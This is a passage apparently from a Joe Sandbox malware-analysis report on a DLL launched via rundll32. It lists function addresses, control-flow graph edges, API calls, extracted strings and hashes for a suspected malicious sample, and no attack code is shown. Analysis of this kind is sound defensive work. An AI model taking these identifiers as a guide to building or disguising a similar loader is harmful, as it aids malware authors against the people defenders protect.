                  • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
                  • API String ID: 667068680-2765630095
                  • Opcode ID: 45564cd1df150ab7dbbc628e6f45e0c53d7915506d181a82d16ca34f192e5ad7
                  • Instruction ID: 425c6344d658a48c52f5a1f54e224fa0f0ec4f1c6bfd8078fbe2181997159c11
                  • Opcode Fuzzy Hash: 45564cd1df150ab7dbbc628e6f45e0c53d7915506d181a82d16ca34f192e5ad7
                  • Instruction Fuzzy Hash: 235106B1D002889BCB25CFA8DC919EEBBB4BF49308F15812DD961D7B51EB31951DCB60
                  Function 6CE06710 Relevance: 13.9, APIs: 9, Instructions: 354COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 385 6ce06710-6ce06748 386 6ce0674a-6ce0674c 385->386 387 6ce0676f-6ce06771 385->387 386->387 389 6ce0674e-6ce06759 call 6cdfe211 call 6cdfbcda 386->389 388 6ce06773-6ce06775 387->388 387->389 388->389 390 6ce06777-6ce06784 388->390 393 6ce0675e-6ce0676e call 6cdf2d25 389->393 392 6ce06786-6ce0678a 390->392 390->393 397 6ce0678c 392->397 399 6ce06792-6ce0679e 397->399 400 6ce067a4-6ce067a6 399->400 401 6ce0685a-6ce0688b mydllmain 399->401 402 6ce06bd3-6ce06be2 400->402 403 6ce067ac-6ce067af 400->403 407 6ce068da-6ce068f6 mydllmain 401->407 408 6ce0688d-6ce0689b 401->408 402->393 404 6ce06be8-6ce06bf9 402->404 406 6ce067b5-6ce067c1 403->406 404->397 409 6ce067f2-6ce067fc 406->409 410 6ce067c3-6ce067d4 mydllmain 406->410 421 6ce06941-6ce0695e mydllmain 407->421 422 6ce068f8-6ce06908 407->422 408->407 413 6ce0689d-6ce068ab 408->413 411 6ce06839-6ce0684f 409->411 412 6ce067fe-6ce06808 409->412 419 6ce067e0 410->419 420 6ce067d6-6ce067de 410->420 411->406 416 6ce06855 411->416 415 6ce06810-6ce0682b 412->415 417 6ce068b0-6ce068c0 413->417 415->415 423 6ce0682d-6ce06833 415->423 416->402 417->417 424 6ce068c2-6ce068d4 417->424 425 6ce067e6-6ce067f0 419->425 420->425 430 6ce06960-6ce06966 421->430 431 6ce06995-6ce0699d 421->431 422->421 426 6ce0690a-6ce0691a 422->426 423->411 424->407 425->409 425->410 427 6ce06920-6ce06933 426->427 427->427 429 6ce06935-6ce0693b 427->429 429->421 430->431 432 6ce06968-6ce06972 430->432 433 6ce069a3-6ce069a5 431->433 436 6ce06974-6ce06987 432->436 434 6ce069e5-6ce069eb 433->434 435 6ce069a7 433->435 438 6ce069f0-6ce069f4 434->438 437 6ce069b0-6ce069ba 435->437 436->436 439 6ce06989-6ce0698f 436->439 440 6ce069bc-6ce069db mydllmain 437->440 441 6ce069df 437->441 442 6ce06a15-6ce06a1b 438->442 443 6ce069f6-6ce06a13 mydllmain 438->443 439->431 440->437 448 6ce069dd 440->448 441->434 444 6ce06a21-6ce06a27 442->444 443->438 443->442 447 6ce06a30-6ce06a42 444->447 449 6ce06a63-6ce06a71 447->449 450 6ce06a44-6ce06a55 mydllmain 447->450 448->444 451 6ce06a73-6ce06a7b 449->451 452 6ce06abd-6ce06abf 449->452 450->447 458 6ce06a57-6ce06a5d 450->458 454 6ce06aa8-6ce06ab0 451->454 455 6ce06a7d-6ce06a7f 451->455 456 6ce06ac1-6ce06ac7 452->456 457 6ce06afd-6ce06b09 452->457 454->433 461 6ce06ab6-6ce06ab8 454->461 460 6ce06a81-6ce06a94 455->460 462 6ce06ad0-6ce06ada 456->462 459 6ce06b10-6ce06b1a 457->459 458->449 463 6ce06b3b 459->463 464 6ce06b1c-6ce06b39 mydllmain 459->464 460->460 465 6ce06a96-6ce06aa2 460->465 461->433 462->457 466 6ce06adc-6ce06af9 mydllmain 462->466 467 6ce06b41-6ce06b5b 463->467 464->459 464->463 465->454 466->462 472 6ce06afb 466->472 469 6ce06b9a-6ce06b9c 467->469 470 6ce06b5d-6ce06b65 467->470 475 6ce06bb6-6ce06bbe 469->475 476 6ce06b9e-6ce06bb0 469->476 473 6ce06b67-6ce06b79 470->473 474 6ce06b7f-6ce06b8d 470->474 472->467 473->474 474->402 477 6ce06b8f-6ce06b95 474->477 478 6ce06bc0-6ce06bc8 475->478 479 6ce06bcd 475->479 476->475 477->399 478->397 479->402
                  APIs
                  • mydllmain.UIFTTNKL2R(00000000,?), ref: 6CE067C7
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: mydllmain
                  • String ID:
                  • API String ID: 979097349-0
                  • Opcode ID: 72b7d4d62d11674e5481037c0333d9c038b14fca1d2a74066183c7589bf8a711
                  • Instruction ID: 67f4da6d1bec6f5e9f1b6000aa58b14403ff77c4906f81fe86b027ad3a7ee607
                  • Opcode Fuzzy Hash: 72b7d4d62d11674e5481037c0333d9c038b14fca1d2a74066183c7589bf8a711
                  • Instruction Fuzzy Hash: F9E15D31F4422A8BCB25CF1889817DDB7B9AB59304F2481E9D898E7B01D670AED48FD0
                  Function 6CDF4786 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 480 6cdf4786-6cdf47b1 call 6cdf5700 483 6cdf47b7-6cdf47ba 480->483 484 6cdf4b25-6cdf4b2a call 6cdfcb25 480->484 483->484 485 6cdf47c0-6cdf47c9 483->485 487 6cdf47cf-6cdf47d3 485->487 488 6cdf48c6-6cdf48cc 485->488 487->488 490 6cdf47d9-6cdf47e0 487->490 491 6cdf48d4-6cdf48e2 488->491 492 6cdf47f8-6cdf47fd 490->492 493 6cdf47e2-6cdf47e9 490->493 494 6cdf4a8e-6cdf4a91 491->494 495 6cdf48e8-6cdf48ec 491->495 492->488 497 6cdf4803-6cdf480b call 6cdf4441 492->497 493->492 496 6cdf47eb-6cdf47f2 493->496 498 6cdf4ab4-6cdf4abd call 6cdf4441 494->498 499 6cdf4a93-6cdf4a96 494->499 495->494 500 6cdf48f2-6cdf48f9 495->500 496->488 496->492 513 6cdf4abf-6cdf4ac3 497->513 516 6cdf4811-6cdf482a call 6cdf4441 * 2 497->516 498->484 498->513 499->484 502 6cdf4a9c-6cdf4ab1 call 6cdf4b2b 499->502 503 6cdf48fb-6cdf4902 500->503 504 6cdf4911-6cdf4917 500->504 502->498 503->504 511 6cdf4904-6cdf490b 503->511 506 6cdf4a2e-6cdf4a32 504->506 507 6cdf491d-6cdf4944 call 6cdf39ff 504->507 514 6cdf4a3e-6cdf4a4a 506->514 515 6cdf4a34-6cdf4a3d call 6cdf3e30 506->515 507->506 522 6cdf494a-6cdf494d 507->522 511->494 511->504 514->498 520 6cdf4a4c-6cdf4a56 514->520 515->514 516->484 539 6cdf4830-6cdf4836 516->539 524 6cdf4a58-6cdf4a5a 520->524 525 6cdf4a64-6cdf4a66 520->525 530 6cdf4950-6cdf4965 522->530 524->498 531 6cdf4a5c-6cdf4a60 524->531 527 6cdf4a7d-6cdf4a8a call 6cdf51a4 525->527 528 6cdf4a68-6cdf4a7b call 6cdf4441 * 2 525->528 547 6cdf4a8c 527->547 548 6cdf4ae9-6cdf4afe call 6cdf4441 * 2 527->548 554 6cdf4ac4 call 6cdfcae9 528->554 534 6cdf4a0f-6cdf4a22 530->534 535 6cdf496b-6cdf496e 530->535 531->498 537 6cdf4a62 531->537 534->530 540 6cdf4a28-6cdf4a2b 534->540 535->534 541 6cdf4974-6cdf497c 535->541 537->528 544 6cdf4838-6cdf483c 539->544 545 6cdf4862-6cdf486a call 6cdf4441 539->545 540->506 541->534 546 6cdf4982-6cdf4996 541->546 544->545 550 6cdf483e-6cdf4845 544->550 564 6cdf48ce-6cdf48d1 545->564 565 6cdf486c-6cdf488c call 6cdf4441 * 2 call 6cdf51a4 545->565 551 6cdf4999-6cdf49aa 546->551 547->498 577 6cdf4b03-6cdf4b20 call 6cdf3beb call 6cdf50a4 call 6cdf5261 call 6cdf501b 548->577 578 6cdf4b00 548->578 555 6cdf4859-6cdf485c 550->555 556 6cdf4847-6cdf484e 550->556 557 6cdf49ac-6cdf49bd call 6cdf4c61 551->557 558 6cdf49d0-6cdf49dd 551->558 569 6cdf4ac9-6cdf4ae4 call 6cdf3e30 call 6cdf4e15 call 6cdf3fdc 554->569 555->484 555->545 556->555 562 6cdf4850-6cdf4857 556->562 574 6cdf49bf-6cdf49c8 557->574 575 6cdf49e1-6cdf4a09 call 6cdf4706 557->575 558->551 567 6cdf49df 558->567 562->545 562->555 564->491 565->564 594 6cdf488e-6cdf4893 565->594 568 6cdf4a0c 567->568 568->534 569->548 574->557 582 6cdf49ca-6cdf49cd 574->582 575->568 577->484 578->577 582->558 594->554 596 6cdf4899-6cdf48ac call 6cdf4e2d 594->596 596->569 601 6cdf48b2-6cdf48be 596->601 601->554 602 6cdf48c4 601->602 602->596
                  APIs
                  • type_info::operator==.LIBVCRUNTIME ref: 6CDF48A5
                  • ___TypeMatch.LIBVCRUNTIME ref: 6CDF49B3
                  • _UnwindNestedFrames.LIBCMT ref: 6CDF4B05
                  • CallUnexpected.LIBVCRUNTIME ref: 6CDF4B20
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                  • String ID: csm$csm$csm
                  • API String ID: 2751267872-393685449
                  • Opcode ID: e4c5e4d7f6205273afa9c9b04dd51d1405daa3bcc43178d3e99fb498a2080327
                  • Instruction ID: 997eff579f9f4d4b10920e0034ec8fdb8b0fdf839abcc3950d48b6f17865fbb3
                  • Opcode Fuzzy Hash: e4c5e4d7f6205273afa9c9b04dd51d1405daa3bcc43178d3e99fb498a2080327
                  • Instruction Fuzzy Hash: A2B16A71804219EFCF05CFA5CA8099EB7B5BF04318F16425AE9307BA21D731DA56CFA6
                  Function 6CDF4090 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 122COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 603 6cdf4090-6cdf40e1 call 6ce0a560 call 6cdf4050 call 6cdf52bc 610 6cdf413d-6cdf4140 603->610 611 6cdf40e3-6cdf40f5 603->611 612 6cdf4142-6cdf414f call 6cdf5440 610->612 613 6cdf4160-6cdf4169 610->613 611->613 614 6cdf40f7-6cdf410e 611->614 619 6cdf4154-6cdf415d call 6cdf4050 612->619 616 6cdf4124 614->616 617 6cdf4110-6cdf411e call 6cdf53e0 614->617 618 6cdf4127-6cdf412c 616->618 626 6cdf4134-6cdf413b 617->626 627 6cdf4120 617->627 618->614 621 6cdf412e-6cdf4130 618->621 619->613 621->613 624 6cdf4132 621->624 624->619 626->619 628 6cdf416a-6cdf4173 627->628 629 6cdf4122 627->629 630 6cdf41ad-6cdf41bd call 6cdf5420 628->630 631 6cdf4175-6cdf417c 628->631 629->618 637 6cdf41bf-6cdf41ce call 6cdf5440 630->637 638 6cdf41d1-6cdf41ef call 6cdf4050 call 6cdf5400 630->638 631->630 633 6cdf417e-6cdf418d call 6ce09f40 631->633 639 6cdf418f-6cdf41a7 mydllmain 633->639 640 6cdf41aa 633->640 637->638 639->640 640->630
                  APIs
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF40C7
                  • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDF40CF
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF4158
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDF4183
                  • mydllmain.UIFTTNKL2R(?,00000001), ref: 6CDF419C
                  • _ValidateLocalCookies.LIBCMT ref: 6CDF41D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
                  • String ID: csm
                  • API String ID: 2845398917-1018135373
                  • Opcode ID: e27e630f3de56f3f9abe7f793f8af1083c37b4ce17176d04900e3f2ed5ccbfae
                  • Instruction ID: 25bc80b62971eac95ec2666a3ab8c38fb621d7975d24c8010b6569e63c649116
                  • Opcode Fuzzy Hash: e27e630f3de56f3f9abe7f793f8af1083c37b4ce17176d04900e3f2ed5ccbfae
                  • Instruction Fuzzy Hash: F4418334A01209DFCF00DF69C980A9EBBB5FF45328F15815AE8389BB61D731DA56CB91
                  Function 6CDFE73F Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 648 6cdfe73f-6cdfe750 649 6cdfe754-6cdfe75f 648->649 650 6cdfe752 648->650 651 6cdfe783-6cdfe796 649->651 652 6cdfe761-6cdfe77e call 6cdfbc5d 649->652 650->649 654 6cdfe7eb-6cdfe7ee 651->654 655 6cdfe798-6cdfe7b8 call 6cdfea6c 651->655 662 6cdfea68-6cdfea6b 652->662 658 6cdfe7fa-6cdfe82b 654->658 659 6cdfe7f0 654->659 669 6cdfe7ba-6cdfe7bd 655->669 670 6cdfe7c2-6cdfe7ce call 6ce0a420 655->670 660 6cdfe82d-6cdfe83b 658->660 661 6cdfe84b 658->661 664 6cdfe7f6-6cdfe7f9 659->664 665 6cdfe7f2-6cdfe7f4 659->665 666 6cdfe83d-6cdfe840 660->666 667 6cdfe842-6cdfe849 660->667 668 6cdfe84e-6cdfe853 661->668 664->658 665->658 665->664 666->668 667->668 671 6cdfe859-6cdfe860 668->671 672 6cdfe855-6cdfe857 668->672 673 6cdfea67 669->673 680 6cdfea65 670->680 681 6cdfe7d4-6cdfe7e6 670->681 676 6cdfe86f-6cdfe87a 671->676 677 6cdfe862-6cdfe86c call 6cdfa560 671->677 675 6cdfe87c-6cdfe889 672->675 673->662 682 6cdfe88b-6cdfe88e 675->682 683 6cdfe894-6cdfe8a4 675->683 676->675 677->676 680->673 681->680 682->683 685 6cdfe953-6cdfe955 682->685 686 6cdfe8a7-6cdfe8b7 683->686 689 6cdfe967-6cdfe96d 685->689 690 6cdfe957-6cdfe965 call 6cdf41f0 685->690 687 6cdfe909-6cdfe91e call 6cdfef7f 686->687 688 6cdfe8b9-6cdfe8dd call 6ce0a370 686->688 687->689 702 6cdfe920-6cdfe926 687->702 700 6cdfe8df 688->700 701 6cdfe8e2-6cdfe905 688->701 694 6cdfe96f 689->694 695 6cdfe971-6cdfe99c call 6ce0a370 689->695 690->689 694->695 706 6cdfe99e 695->706 707 6cdfe9a8-6cdfe9b1 695->707 700->701 701->686 704 6cdfe907 701->704 705 6cdfe929-6cdfe92e 702->705 704->685 708 6cdfe935-6cdfe938 705->708 709 6cdfe930-6cdfe933 705->709 710 6cdfe9a4-6cdfe9a6 706->710 711 6cdfe9a0-6cdfe9a2 706->711 712 6cdfe9b2-6cdfe9be 707->712 708->705 709->708 715 6cdfe93a-6cdfe940 709->715 710->712 711->707 711->710 713 6cdfea5a-6cdfea61 712->713 714 6cdfe9c4-6cdfe9c9 712->714 713->680 716 6cdfe9cf-6cdfe9fb call 6ce0a0b0 call 6ce0a290 714->716 717 6cdfe9cb-6cdfe9cd 714->717 718 6cdfe942-6cdfe945 715->718 719 6cdfe950 715->719 720 6cdfe9fd-6cdfe9ff 716->720 727 6cdfea08-6cdfea2d call 6ce0a0b0 call 6ce0a290 716->727 717->716 717->720 722 6cdfe94a-6cdfe94e 718->722 723 6cdfe947 718->723 719->685 720->713 725 6cdfea01 720->725 722->685 723->722 725->727 728 6cdfea03-6cdfea06 725->728 730 6cdfea2f-6cdfea31 727->730 734 6cdfea3a-6cdfea58 call 6ce0a0b0 call 6ce0a290 727->734 728->727 728->730 730->713 732 6cdfea33 730->732 732->734 735 6cdfea35-6cdfea38 732->735 734->713 735->713 735->734
                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: _strrchr
                  • String ID:
                  • API String ID: 3213747228-0
                  • Opcode ID: dccc5fed7eae1ac0f2b9dc4a4a5c9194eecbad04fa69afc9fd44217c599bdb86
                  • Instruction ID: bde302714e3582dea2042b3f93d2c5c0a3a3695a4739685e07f364c0e2e0b923
                  • Opcode Fuzzy Hash: dccc5fed7eae1ac0f2b9dc4a4a5c9194eecbad04fa69afc9fd44217c599bdb86
                  • Instruction Fuzzy Hash: 61B14432A05399DFEB118F68C880BAEBBB5FF46314F164155E864ABB91D3749902C7E0
                  Function 6CDF2EF3 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • __RTC_Initialize.LIBCMT ref: 6CDF2F3A
                  • ___scrt_uninitialize_crt.LIBCMT ref: 6CDF2F54
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: Initialize___scrt_uninitialize_crt
                  • String ID:
                  • API String ID: 2442719207-0
                  • Opcode ID: 26d0c6b1ed7d015f48c3559dcff077247d3b9d3f0409c5009c3922b891adb4be
                  • Instruction ID: 13b978d1b5449cba21717cfc14234ee8deeaf57e55d314901adf2f81ecbec747
                  • Opcode Fuzzy Hash: 26d0c6b1ed7d015f48c3559dcff077247d3b9d3f0409c5009c3922b891adb4be
                  • Instruction Fuzzy Hash: 5341E4B2E15654EBDB208F66CC04B9E7AB4FF8475CF134116E8345BB60D73089078BA1
                  Function 6CE01EAA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 792 6ce01eaa-6ce01eb5 793 6ce01ec6-6ce01ecc 792->793 794 6ce01eb7-6ce01ec1 call 6ce01f93 792->794 795 6ce01ef3-6ce01f08 call 6ce029f7 793->795 796 6ce01ece-6ce01ed4 793->796 805 6ce01f69-6ce01f6b 794->805 807 6ce01f20-6ce01f27 795->807 808 6ce01f0a-6ce01f1e GetLastError call 6cdfe1b7 call 6cdfe211 795->808 798 6ce01ed6-6ce01ee1 call 6ce01f6c 796->798 799 6ce01ee7-6ce01ef1 796->799 798->799 803 6ce01f68 798->803 799->803 803->805 810 6ce01f35-6ce01f49 call 6ce01d01 807->810 811 6ce01f29-6ce01f33 call 6ce01f6c 807->811 808->803 819 6ce01f61-6ce01f65 810->819 820 6ce01f4b-6ce01f5f GetLastError call 6cdfe1b7 call 6cdfe211 810->820 811->810 818 6ce01f67 811->818 818->803 819->818 820->818
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3 l$C:\Windows\SysWOW64\rundll32.exe
                  • API String ID: 0-542011148
                  • Opcode ID: b6a2112bbe9228fb9c9d048d777419a38d09d1f1061546018f3a1f7f2f9ee234
                  • Instruction ID: 79067004ee339bce1677c60b3ff8fa11fbe43582b9e005394efbfee4124cc4d1
                  • Opcode Fuzzy Hash: b6a2112bbe9228fb9c9d048d777419a38d09d1f1061546018f3a1f7f2f9ee234
                  • Instruction Fuzzy Hash: 92215E31708206AF9B109FE6CC4199B77B9BF423AC7254619E864DBF50E731E82587E0
                  Function 6CDFF7B5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 826 6cdff7b5-6cdff7c1 827 6cdff853-6cdff856 826->827 828 6cdff85c 827->828 829 6cdff7c6-6cdff7d7 827->829 830 6cdff85e-6cdff862 828->830 831 6cdff7d9-6cdff7dc 829->831 832 6cdff7e4-6cdff7fd LoadLibraryExW 829->832 833 6cdff87c-6cdff87e 831->833 834 6cdff7e2 831->834 835 6cdff7ff-6cdff808 GetLastError 832->835 836 6cdff863-6cdff873 832->836 833->830 838 6cdff850 834->838 839 6cdff80a-6cdff81c call 6cdfcc48 835->839 840 6cdff841-6cdff84e 835->840 836->833 837 6cdff875-6cdff876 FreeLibrary 836->837 837->833 838->827 839->840 843 6cdff81e-6cdff830 call 6cdfcc48 839->843 840->838 843->840 846 6cdff832-6cdff83f LoadLibraryExW 843->846 846->836 846->840
                  APIs
                  • FreeLibrary.KERNEL32(00000000,?,6CDFF8C4,6CDF5FC1,B583E81C,00000000,6CDFA99A,00000000,?,6CDFFA3D,00000022,FlsSetValue,6CE0D4F0,ccs,6CDFA99A), ref: 6CDFF876
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID: api-ms-$ext-ms-
                  • API String ID: 3664257935-537541572
                  • Opcode ID: ae8f04d9a92ccc47a107f3aaf904254b1b1d3bdd7bc796fb8cd79cc5e353af15
                  • Instruction ID: 405cddab5b2cc517201c4f2089265643c4184dac276e0659c5f811b74e5e073c
                  • Opcode Fuzzy Hash: ae8f04d9a92ccc47a107f3aaf904254b1b1d3bdd7bc796fb8cd79cc5e353af15
                  • Instruction Fuzzy Hash: CA210872F01119E7DB119B65CC80B4A77B8BB43378F260125E935A7790D730E912C6D0
                  Function 6CDFC20A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,42800FE9,6CDFA99A,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC23F
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDFC251
                  • mydllmain.UIFTTNKL2R(B583E81C,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC262
                  • FreeLibrary.KERNEL32(00000000,?,00000000,6CE0A770,000000FF,?,6CDFC1A4,B583E81C,?,6CDFC178,?), ref: 6CDFC273
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProcmydllmain
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 361333426-1276376045
                  • Opcode ID: 7590220388d4d6b3c9e613662b4e0c24b37da2d81281bf934a98d98083edd542
                  • Instruction ID: dc5e5c27f21268c63dcde9a36d8c752134f9fded225fe38b764fde346fa98487
                  • Opcode Fuzzy Hash: 7590220388d4d6b3c9e613662b4e0c24b37da2d81281bf934a98d98083edd542
                  • Instruction Fuzzy Hash: B5018F31B04619EBDB119B90CC09FAEBBB8FB45B15F104529E822A2690DB359910CAD0
                  Function 6CDFDBF7 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723081682.000000006CE13000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723136585.000000006CE15000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_6cdf0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 47ec99b5c8bb707002f006cb681261f56ad97a74cb9623aa1d5cf861a412e95b
                  • Instruction ID: 2c63f7196531f16a3d049d74ace63d2bd4c2700609c8b44d10c9453455a02bd4
                  • Opcode Fuzzy Hash: 47ec99b5c8bb707002f006cb681261f56ad97a74cb9623aa1d5cf861a412e95b
                  • Instruction Fuzzy Hash: 47B10670A04289EFDB01CF99C840BEEBBB1BF5A318F164159E57497BA1C7709947CBA0
                  Function 6CDF1795 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.1722835798.000000006CDF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CDF0000, based on PE: true
                  • Associated: 00000003.00000002.1722777207.000000006CDF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.1723035391.000000006CE0B000.00000002.00000001.01000000.00000003.sdmpDownload File
